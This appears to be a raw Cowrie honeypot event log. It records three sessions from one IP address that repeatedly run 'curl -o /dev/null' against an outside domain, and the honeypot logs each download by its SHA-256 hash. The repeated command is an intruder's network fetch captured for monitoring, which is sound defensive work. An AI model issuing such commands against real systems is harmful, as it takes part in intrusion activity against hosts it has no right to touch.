{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.964464Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.968168Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.968772Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.972337Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.974128Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.975580Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.004153Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.004947Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.010468Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.014112Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.017864Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.019558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.020716Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.039271Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.040005Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.044653Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.045294Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.049886Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.051682Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.069619Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.070623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.071189Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.075569Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.078445Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.079502Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.080311Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.082170Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.083054Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.111482Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.112154Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.115513Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.117881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.119656Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.120470Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.122601Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.123611Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.150214Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.150885Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.155379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.158526Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.161021Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.161916Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.163320Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.164114Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.167950Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.199289Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.199973Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.203380Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.204368Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.205958Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.206681Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.231525Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.233864Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.260699Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.261353Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.264924Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.267625Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.268603Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.270345Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.271444Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.274984Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.277201Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.313364Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.314241Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.318284Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.319098Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.323084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.326206Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.328221Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.329413Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.330101Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.363419Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.364065Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.365646Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.366423Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.370166Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.372186Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.372836Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.376759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.379320Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.412390Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
